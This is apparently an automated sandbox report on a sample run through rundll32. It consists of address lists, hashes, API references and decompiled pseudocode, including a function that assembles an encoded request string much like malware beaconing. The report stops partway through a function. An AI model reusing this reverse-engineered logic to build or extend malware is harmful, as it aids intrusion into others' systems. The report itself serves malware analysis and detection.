0x044b856e
0x044b8572
0x044b8577
0x044b8579
0x044b85f7
0x044b85f7
0x044b857b
0x044b857b
0x044b857b
0x044b85f9
0x044b85fb
0x044b86dc
0x044b86dc
0x00000000
0x044b8601
0x044b8601
0x044b8608
0x00000000
0x00000000
0x044b860e
0x044b8612
0x044b866e
0x044b8670
0x044b8678
0x044b867a
0x044b867c
0x00000000
0x00000000
0x044b867e
0x044b8684
0x044b8686
0x044b8688
0x044b869d
0x044b869d
0x044b869f
0x044b86ce
0x044b86d5
0x00000000
0x044b86d5
0x044b86a3
0x044b86a4
0x044b86a6
0x044b86a8
0x044b86a8
0x044b86aa
0x044b86ac
0x044b86ae
0x044b86c2
0x044b86c2
0x044b86c5
0x044b86c7
0x044b86c7
0x044b86c8
0x044b86c8
0x00000000
0x044b86b0
0x044b86b0
0x044b86b0
0x044b86b9
0x044b86ba
0x044b86bc
0x044b86be
0x044b86be
0x00000000
0x044b86b0
0x044b86ae
0x044b868a
0x044b8691
0x044b8691
0x044b8693
0x00000000
0x00000000
0x044b8695
0x044b8696
0x044b8699
0x044b869b
0x00000000
0x00000000
0x00000000
0x044b869b
0x00000000
0x044b8691
0x044b8614
0x044b8617
0x044b861c
0x00000000
0x00000000
0x044b8625
0x044b8627
0x044b862d
0x00000000
0x00000000
0x044b8633
0x044b8639
0x00000000
0x00000000
0x044b863f
0x044b8641
0x044b864a
0x044b864e
0x00000000
0x00000000
0x044b8654
0x044b8657
0x044b8659
0x00000000
0x00000000
0x044b8660
0x044b8662
0x00000000
0x00000000
0x044b8664
0x044b8668
0x00000000
0x00000000
0x00000000
0x044b8668
0x00000000
0x00000000
0x00000000
0x044b8553
0x044b8553
0x044b8553
0x044b855a
0x00000000
0x00000000
0x044b855c
0x044b855d
0x044b855f
0x00000000
0x00000000
0x00000000
0x044b855f
0x044b8587
0x044b8589
0x00000000
0x00000000
0x044b8599
0x044b859b
0x044b859d
0x00000000
0x00000000
0x044b85a3
0x044b85aa
0x044b85d6
0x044b85d6
0x044b85d8
0x044b85da
0x044b85ee
0x044b85f0
0x00000000
0x00000000
0x00000000
0x00000000
0x044b85dc
0x044b85dc
0x044b85dc
0x044b85e5
0x044b85e6
0x044b85e8
0x044b85ea
0x044b85ea
0x00000000
0x044b85dc
0x044b85ac
0x044b85ac
0x044b85af
0x044b85b1
0x044b85c3
0x044b85c3
0x044b85c6
0x044b85c8
0x044b85c8
0x044b85c9
0x044b85c9
0x044b85cf
0x044b85cf
0x00000000
0x00000000
0x00000000
0x00000000
0x044b85b3
0x044b85b3
0x044b85b3
0x044b85ba
0x00000000
0x00000000
0x044b85bc
0x044b85bc
0x044b85bd
0x00000000
0x00000000
0x00000000
0x044b85bd
0x044b85bf
0x044b85c1
0x044b85d4
0x00000000
0x00000000
0x00000000
0x044b85d4
0x00000000
0x044b85c1
0x044b8533
0x044b8536
0x044b8539
0x00000000
0x00000000
0x044b853b
0x044b853d
0x00000000
0x00000000
0x00000000
0x044b853d
0x044b8502
0x044b8504
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 044B8572

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: e787db368f67f552b6332eaa69b1b70a7b6f72b476ccfc0b472bc8e784eb0266
Instruction ID: 7f28e323381edf91c0476b2cbb3d3893f3c4b505bbd9c220bca6b9f932aea0f8
Opcode Fuzzy Hash: e787db368f67f552b6332eaa69b1b70a7b6f72b476ccfc0b472bc8e784eb0266
Instruction Fuzzy Hash: 946193706006069FDF29AE29C4906EA73A9EB85354B24C92BD486D7391FB35F84287F0

Uniqueness

Uniqueness Score: -1.00%

Function 00402274 Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00402274(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E004023DB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00402495(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00402380(_t55, _t66);
										_t89 = _t66 + 0x10;
										E004023DB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00402477(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00402278
0x00402279
0x0040227a
0x0040227d
0x0040227f
0x00402282
0x00402283
0x00402285
0x00402286
0x00402287
0x0040228a
0x00402294
0x00402345
0x0040234c
0x00402355
0x0040229a
0x0040229a
0x004022a0
0x004022a6
0x004022a9
0x004022ac
0x004022b0
0x004022b5
0x004022ba
0x0040233a
0x00000000
0x004022bc
0x004022bc
0x004022c8
0x004022ca
0x00402325
0x00402325
0x0040232b
0x00000000
0x004022cc
0x004022db
0x004022dd
0x004022de
0x004022df
0x004022e2
0x004022e2
0x004022e4
0x00000000
0x004022e6
0x004022e6
0x00402330
0x004022e8
0x004022e8
0x004022ec
0x004022f4
0x004022f9
0x004022fe
0x0040230a
0x00402312
0x00402319
0x0040231f
0x00402323
0x00000000
0x00402323
0x004022e6
0x004022e4
0x00000000
0x004022ca
0x0040233e
0x0040233e
0x0040233e
0x004022ba
0x0040235a
0x00402361

Memory Dump Source

Source File: 00000003.00000002.950458300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.950449846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950465136.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950497345.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.950532385.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: c3b74f21b36d53aafec6f67f7e05ba827982a1db6c455aeb72717833d71b06b4
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: D121C4729002049BCB14DF79C9848ABB7A5FF48350B4580AAEC55AB2C5D778FA15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 044B829C Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E044B829C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E044B8407(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E044B84C1(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E044B83AC(_t55, _t66);
										_t89 = _t66 + 0x10;
										E044B8407(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E044B84A3(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x044b82a0
0x044b82a1
0x044b82a2
0x044b82a5
0x044b82a7
0x044b82aa
0x044b82ab
0x044b82ad
0x044b82ae
0x044b82af
0x044b82b2
0x044b82bc
0x044b836d
0x044b8374
0x044b837d
0x044b82c2
0x044b82c2
0x044b82c8
0x044b82ce
0x044b82d1
0x044b82d4
0x044b82d8
0x044b82dd
0x044b82e2
0x044b8362
0x00000000
0x044b82e4
0x044b82e4
0x044b82f0
0x044b82f2
0x044b834d
0x044b834d
0x044b8353
0x00000000
0x044b82f4
0x044b8303
0x044b8305
0x044b8306
0x044b8307
0x044b830a
0x044b830a
0x044b830c
0x00000000
0x044b830e
0x044b830e
0x044b8358
0x044b8310
0x044b8310
0x044b8314
0x044b831c
0x044b8321
0x044b8326
0x044b8332
0x044b833a
0x044b8341
0x044b8347
0x044b834b
0x00000000
0x044b834b
0x044b830e
0x044b830c
0x00000000
0x044b82f2
0x044b8366
0x044b8366
0x044b8366
0x044b82e2
0x044b8382
0x044b8389

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: bb1fa36793f4a6ceebf3a85dbb9ed525833721fd00b7ab4fef8ce03881db127e
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 5D21D6729003049FDF10EF69C8808EBB7A9FF45310B09956AD8999B246EB31F915CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 044B300E Relevance: 36.3, APIs: 24, Instructions: 266
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E044B300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t74;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t79;
				int _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				void* _t86;
				void* _t89;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr* _t99;
				int* _t105;
				int* _t115;
				char** _t117;
				char* _t118;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t141;
				int _t144;
				void* _t145;
				intOrPtr _t159;
				void* _t161;
				int _t162;
				void* _t163;
				void* _t164;
				long _t165;
				intOrPtr* _t166;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr* _t171;
				char** _t174;
				char** _t176;
				char** _t177;
				void* _t182;

				_t66 = __eax;
				_t174 =  &_v16;
				_t145 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t66 = GetTickCount();
				}
				_t67 =  *0x44ba018; // 0x1af7f861
				asm("bswap eax");
				_t68 =  *0x44ba014; // 0x3a87c8cd
				asm("bswap eax");
				_t69 =  *0x44ba010; // 0xd8d2f808
				asm("bswap eax");
				_t70 =  *0x44ba00c; // 0x8f8f86c2
				asm("bswap eax");
				_t71 =  *0x44ba348; // 0x9ad5a8
				_t3 = _t71 + 0x44bb62b; // 0x74666f73
				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x44ba02c,  *0x44ba004, _t66);
				_t74 = E044B6927();
				_t75 =  *0x44ba348; // 0x9ad5a8
				_t4 = _t75 + 0x44bb66b; // 0x74707526
				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
				_t176 =  &(_t174[0xe]);
				_t163 = _t162 + _t78;
				if(_a24 != 0) {
					_t141 =  *0x44ba348; // 0x9ad5a8
					_t8 = _t141 + 0x44bb676; // 0x732526
					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
					_t176 =  &(_t176[3]);
					_t163 = _t163 + _t144;
				}
				_t79 =  *0x44ba348; // 0x9ad5a8
				_t10 = _t79 + 0x44bb78e; // 0x4e68d36
				_t182 = _a20 - _t10;
				_t12 = _t79 + 0x44bb2de; // 0x74636126
				_t157 = 0 | _t182 == 0x00000000;
				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
				_t177 =  &(_t176[3]);
				_t164 = _t163 + _t82;
				_t83 = E044B22D7(_t10);
				_a32 = _t83;
				if(_t83 != 0) {
					_t136 =  *0x44ba348; // 0x9ad5a8
					_t17 = _t136 + 0x44bb8d0; // 0x736e6426
					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
					_t177 =  &(_t177[3]);
					_t164 = _t164 + _t139;
					HeapFree( *0x44ba2d8, 0, _a40);
				}
				_t84 = E044B2A11();
				_a32 = _t84;
				if(_t84 != 0) {
					_t132 =  *0x44ba348; // 0x9ad5a8
					_t21 = _t132 + 0x44bb8d8; // 0x6f687726
					wsprintfA(_t164 + _t145, _t21, _t84);
					_t177 =  &(_t177[3]);
					HeapFree( *0x44ba2d8, 0, _a40);
				}
				_t159 =  *0x44ba3cc; // 0x4e695b0
				_t86 = E044B2509(0x44ba00a, _t159 + 4);
				_t165 = 0;
				_a16 = _t86;
				if(_t86 == 0) {
					L28:
					HeapFree( *0x44ba2d8, _t165, _t145);
					return _a44;
				} else {
					_t89 = RtlAllocateHeap( *0x44ba2d8, 0, 0x800);
					_a24 = _t89;
					if(_t89 == 0) {
						L27:
						HeapFree( *0x44ba2d8, _t165, _a8);
						goto L28;
					}
					E044B1BE9(GetTickCount());
					_t93 =  *0x44ba3cc; // 0x4e695b0
					__imp__(_t93 + 0x40);
					asm("lock xadd [eax], ecx");
					_t97 =  *0x44ba3cc; // 0x4e695b0
					__imp__(_t97 + 0x40);
					_t99 =  *0x44ba3cc; // 0x4e695b0
					_t161 = E044B1D33(1, _t157, _t145,  *_t99);
					asm("lock xadd [eax], ecx");
					if(_t161 == 0) {
						L26:
						HeapFree( *0x44ba2d8, _t165, _a16);
						goto L27;
					}
					StrTrimA(_t161, 0x44b928c);
					_push(_t161);
					_t105 = E044B393C();
					_v12 = _t105;
					if(_t105 == 0) {
						L25:
						HeapFree( *0x44ba2d8, _t165, _t161);
						goto L26;
					}
					_t166 = __imp__;
					 *_t166(_t161, _a8);
					 *_t166(_a4, _v12);
					_t167 = __imp__;
					 *_t167(_v4, _v24);
					_t168 = E044B61FC( *_t167(_v12, _t161), _v20);
					_v36 = _t168;
					if(_t168 == 0) {
						_v8 = 8;
						L23:
						E044B561E();
						L24:
						HeapFree( *0x44ba2d8, 0, _v40);
						_t165 = 0;
						goto L25;
					}
					_t115 = E044B10B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
					_v12 = _t115;
					if(_t115 == 0) {
						_t171 = _v24;
						_v20 = E044B5B9D(_t171, _t168, _v16, _v12);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E044B6C2C(_t171);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t117 = _v16;
							if(_t117 != 0) {
								_t118 =  *_t117;
								_t169 =  *_v12;
								_v16 = _t118;
								wcstombs(_t118, _t118,  *_v12);
								 *_v24 = E044B3C22(_v16, _v16, _t169 >> 1);
							}
						}
						goto L21;
					} else {
						if(_v16 != 0) {
							L21:
							E044B6C2C(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}

0x044b300e
0x044b300e
0x044b3012
0x044b3019
0x044b3023
0x044b3025
0x044b3025
0x044b3032
0x044b303d
0x044b3040
0x044b304b
0x044b304e
0x044b3053
0x044b3056
0x044b305b
0x044b305e
0x044b306a
0x044b3077
0x044b3079
0x044b307f
0x044b3084
0x044b308f
0x044b3091
0x044b3094
0x044b309b
0x044b309d
0x044b30a6
0x044b30b1
0x044b30b3
0x044b30b6
0x044b30b6
0x044b30b8
0x044b30bd
0x044b30c5
0x044b30c9
0x044b30cf
0x044b30d8
0x044b30da
0x044b30dd
0x044b30df
0x044b30ea
0x044b30f0
0x044b30f3
0x044b30f8
0x044b3103
0x044b3105
0x044b310c
0x044b3116
0x044b3116
0x044b3118
0x044b311d
0x044b3123
0x044b3126
0x044b312b
0x044b3135
0x044b3137
0x044b3146
0x044b3146
0x044b3148
0x044b3156
0x044b315b
0x044b315d
0x044b3163
0x044b3343
0x044b334b
0x044b3358
0x044b3169
0x044b3175
0x044b317b
0x044b3181
0x044b3336
0x044b3341
0x00000000
0x044b3341
0x044b318d
0x044b3192
0x044b319b
0x044b31ac
0x044b31b0
0x044b31b9
0x044b31bf
0x044b31cc
0x044b31d9
0x044b31df
0x044b3329
0x044b3334
0x00000000
0x044b3334
0x044b31eb
0x044b31f1
0x044b31f2
0x044b31f7
0x044b31fd
0x044b331f
0x044b3327
0x00000000
0x044b3327
0x044b3207
0x044b320e
0x044b3218
0x044b321e
0x044b3228
0x044b323a
0x044b323c
0x044b3242
0x044b335b
0x044b330a
0x044b330a
0x044b330f
0x044b331b
0x044b331d
0x00000000
0x044b331d
0x044b324d
0x044b3252
0x044b3258
0x044b3263
0x044b326e
0x044b3272
0x044b3278
0x044b327e
0x044b3284
0x044b3287
0x044b328d
0x044b3290
0x044b3295
0x044b3299
0x044b3299
0x044b32a6
0x044b32b4
0x044b32b9
0x044b32bb
0x044b32c1
0x044b32c7
0x044b32c9
0x044b32ce
0x044b32d2
0x044b32ee
0x044b32ee
0x044b32c1
0x00000000
0x044b32a8
0x044b32ad
0x044b32f0
0x044b32f4
0x044b32fe
0x00000000
0x00000000
0x00000000
0x00000000
0x044b32fe
0x044b32af
0x00000000
0x044b32af
0x044b32a6

APIs

GetTickCount.KERNEL32 ref: 044B3025
wsprintfA.USER32 ref: 044B3072
wsprintfA.USER32 ref: 044B308F
wsprintfA.USER32 ref: 044B30B1
wsprintfA.USER32 ref: 044B30D8
wsprintfA.USER32 ref: 044B3103
HeapFree.KERNEL32(00000000,?), ref: 044B3116
wsprintfA.USER32 ref: 044B3135
HeapFree.KERNEL32(00000000,?), ref: 044B3146
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 044B3175
GetTickCount.KERNEL32 ref: 044B3187
RtlEnterCriticalSection.NTDLL(04E69570), ref: 044B319B
RtlLeaveCriticalSection.NTDLL(04E69570), ref: 044B31B9

Part of subcall function 044B1D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1D5E
Part of subcall function 044B1D33: lstrlen.KERNEL32(00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1D66
Part of subcall function 044B1D33: strcpy.NTDLL ref: 044B1D7D
Part of subcall function 044B1D33: lstrcat.KERNEL32(00000000,00000000), ref: 044B1D88
Part of subcall function 044B1D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1DA5

StrTrimA.SHLWAPI(00000000,044B928C,?,04E695B0), ref: 044B31EB

Part of subcall function 044B393C: lstrlen.KERNEL32(04E69B68,00000000,00000000,00000000,044B5902,00000000), ref: 044B394C
Part of subcall function 044B393C: lstrlen.KERNEL32(?), ref: 044B3954
Part of subcall function 044B393C: lstrcpy.KERNEL32(00000000,04E69B68), ref: 044B3968
Part of subcall function 044B393C: lstrcat.KERNEL32(00000000,?), ref: 044B3973

lstrcpy.KERNEL32(00000000,?), ref: 044B320E
lstrcpy.KERNEL32(?,?), ref: 044B3218
lstrcat.KERNEL32(?,?), ref: 044B3228
lstrcat.KERNEL32(?,00000000), ref: 044B322F

Part of subcall function 044B61FC: lstrlen.KERNEL32(?,00000000,04E69D70,00000000,044B39E8,04E69F93,69B25F44,?,?,?,?,69B25F44,00000005,044BA00C,4D283A53,?), ref: 044B6203
Part of subcall function 044B61FC: mbstowcs.NTDLL ref: 044B622C
Part of subcall function 044B61FC: memset.NTDLL ref: 044B623E

wcstombs.NTDLL ref: 044B32D2

Part of subcall function 044B5B9D: SysAllocString.OLEAUT32(?), ref: 044B5BD8

Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

HeapFree.KERNEL32(00000000,?), ref: 044B331B
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 044B3327
HeapFree.KERNEL32(00000000,?,?,04E695B0), ref: 044B3334
HeapFree.KERNEL32(00000000,?), ref: 044B3341
HeapFree.KERNEL32(00000000,?), ref: 044B334B

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 967369141-0
Opcode ID: c138a235f9cb2e894244b28b3532a1edc7cc2bb6c1154511bbd3298339552eaa
Instruction ID: 52ad18f04605c66b86e75a6614a963dcf1d9927934a6ce8f32b5a87331cf7ef5
Opcode Fuzzy Hash: c138a235f9cb2e894244b28b3532a1edc7cc2bb6c1154511bbd3298339552eaa
Instruction Fuzzy Hash: C7A18D71504304AFEB119F69DC48E9BBBE8EF48714F051829F888E3261DA35EC54DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 044B62F6 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E044B62F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x44ba3dc; // 0x4e69c18
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E044B7367();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E044B7367();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E044B117A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E044B117A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E044B67E7(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x44b918c;
						}
						_t70 = E044B659E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E044B6D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x44ba348; // 0x9ad5a8
								_t102 =  *0x44ba138; // 0x44b7d4b
								_t28 = _t105 + 0x44bbb30; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E044B67E7(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x44b9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E044B6D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E044B6C2C(_v24);
								} else {
									_t92 =  *0x44ba348; // 0x9ad5a8
									_t44 = _t92 + 0x44bbca8; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E044B6C2C(_v8);
						}
						E044B6C2C(_v12);
					}
					E044B6C2C(_v16);
				}
				return _v28;
			}

0x044b62fc
0x044b6304
0x044b6307
0x044b6314
0x044b6317
0x044b631e
0x044b6325
0x044b6328
0x044b6335
0x044b6338
0x044b633b
0x044b6340
0x044b6345
0x044b634d
0x044b6352
0x044b6357
0x044b635d
0x044b6361
0x044b636a
0x044b636e
0x044b6370
0x044b6370
0x044b6378
0x044b637d
0x044b6382
0x044b6388
0x044b638f
0x044b63a0
0x044b63a7
0x044b63b9
0x044b63be
0x044b63c3
0x044b63cc
